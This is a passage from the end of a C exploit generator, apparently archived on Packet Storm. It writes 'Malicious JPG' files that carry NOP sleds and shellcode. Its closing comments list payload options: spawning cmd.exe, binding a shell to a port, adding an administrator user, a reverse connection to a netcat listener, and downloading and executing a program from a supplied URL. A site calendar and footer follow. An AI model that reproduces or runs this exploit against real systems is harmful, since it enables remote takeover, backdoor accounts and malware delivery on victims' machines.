    printf("\t\tWarning: Shellcode Contains FFh D9h, Fix Shellcode\n");

    printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode4)-1);

    j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
    for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
    for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
    for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

    for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
    j=i;
    for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode4[i],fout);
    for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
    for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

    fprintf(fout,"\xFF\xD9");
  
    printf("\t\tOk, Malicious JPG File Created ...\n\n");
    
    fcloseall();
    WSACleanup();  
    }

  if (atoi(argv[1]) == 5) 
    {
     show();
         mkdir("Crypto");
     fout=fopen("Crypto\\Crypto5.jpg","wb");

      if( !fout ) {
                   printf("\t\tErorr:Opening File ...\n");
                   exit(1);
            }

    strcat(shellcode5,argv[2]);
        strcat(shellcode5,"\x01");


    for(i=0;i<sizeof(shellcode5)-1;i++)
    if( 0xD9FF == *(unsigned short *)&shellcode5[i] ) 
    printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");
      

    printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode5)-1);

    j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
    for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
    for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
    for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

    for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
    j=i;
    for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode5[i],fout);
    for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
    for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

    fprintf(fout,"\xFF\xD9");
  
    printf("\t\tOk, Malicious JPG File Created ...\n\n");
    
    fcloseall();
    }

return 0;
}

// You have read till here ? :)
// Well code was not optimized in pourpose, so other's could add some more shellcode's
// with an esy copy+paste :)
// OK some examples here:
//D:\C++\Debug>sacred_jpg.exe 1 [it will pop up cmd.exe]
//D:\C++\Debug>sacred_jpg.exe 2 8081 [it will bind cmd.exe on port 8081]
//D:\C++\Debug>sacred_jpg.exe 3 [it will add user "ASP32.NET" as an administrator]
//D:\C++\Debug>sacred_jpg.exe 4 192.168.0.1 31337
//[it will connest to the 192.168.0.1 on port 31337, of course there listens nc :), nc -l -p 31337]
//D:\C++\Debug>sacred_jpg.exe 5 http://yourserver.com/progam.exe [it will download and then execute program.exe]
//by the way you can compile source code with VC++ 6.0

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close